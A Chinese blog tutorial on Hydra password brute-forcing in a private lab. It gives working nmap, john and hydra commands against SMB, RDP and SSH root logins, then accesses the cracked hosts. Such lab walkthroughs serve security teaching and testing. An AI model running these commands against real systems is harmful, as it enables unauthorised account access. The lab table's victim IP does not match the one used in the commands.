暴力破解-hydra(二)

2022年8月16日14:46:41 发表评论 460 views

1.1 hydra介绍

Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP 等服务,支持Linux、Windows、 Mac平台安装,其中Kali Linux中自带Hydra。

1.2 hydra使用

1.2.1 hydra参数解释

-l:指定单个用户名称.
-L:指定用户名称字典
-p:指定单个密码
-P:指定密码字典
-S:指定端口
-vV:显示详细的执行过程
-t:通过-t参数来指定线程数默认是16会造成服务器拒绝连接,切记不能太快
-e:表示提供了更多测试选项,nsr 后面的字母对应更多的测试方式:
    n:是尝试空密码登录
    s:是将用户名作为密码登录
    r:是将用户名反过来作为密码登录,如用户名是root,那么会使用toor尝试破解

1.3 实验环境

序号 主机IP 主机系统 主机角色
1 192.168.10.180 Kali 攻击机
2 192.168.10.129 Windows 10 64位 攻击机
3 192.168.10.156 Windows 7 32位 被攻击机
4 192.168.10.80 Centos 7 64位 被攻击机

1.4 实例:使用hydra破解系统用户密码

1.4.1 破解win7文件共享密码

1.4.1.1 开启windows文件共享

在Windows系统当中,默认会启动一些文件共享,比如C$或ADMIN$ (管理共享),而这些共享是使用smb协议,因此我可以针对smb协议进行破解。

暴力破解-hydra(二)

1.4.1.2 扫描445端口是否开启

# nmap 192.168.10.157 -p 445
PORT STATE SERVICE
445/tcp open microsoft-ds

1.4.1.3 生成密码字典

通过john工具生成简单的密码字典,一般的弱口令都会包含进去:

# john --wordlist --rules --stdout > m.txt

1.4.1.4 破解smb文件共享密码

# hydra -l pm -P m.txt smb://192.168.10.157 –vV

暴力破解-hydra(二)

1.4.1.5 通过密码远程访问主机资源

在物理机或其他windows主机中打开运行(Win+R)窗口,输入 \\192.168.10.157\c$:

暴力破解-hydra(二)

暴力破解-hydra(二)

暴力破解-hydra(二)

1.4.2 破解win7远程桌面密码

1.4.2.1 开启远程桌面

暴力破解-hydra(二)

暴力破解-hydra(二)

1.4.2.2 扫描3389端口是否开启

# nmap 192.168.10.157 -p 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server

1.4.2.3 生成密码字典

参考 《1.4.1.3》章节

1.4.2.4 破解远程桌面密码

# hydra -l pm -P m.txt rdp://192.168.10.157 –vV

暴力破解-hydra(二)

1.4.2.5 通过远程桌面访问主机资源

暴力破解-hydra(二)

暴力破解-hydra(二)

暴力破解-hydra(二)

1.4.3 破解ssh服务root密码

1.4.3.1 扫描ssh端口是否开启

# nmap 192.168.10.80 -p 22
PORT STATE SERVICE
22/tcp open ssh

1.4.3.2 生成密码字典

参考 《1.4.1.3》章节

1.4.3.3 破解ssh远程密码

# hydra -l root -P m.txt -t 4 ssh://192.168.10.80 -e nsr –vV
暴力破解-hydra(二)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang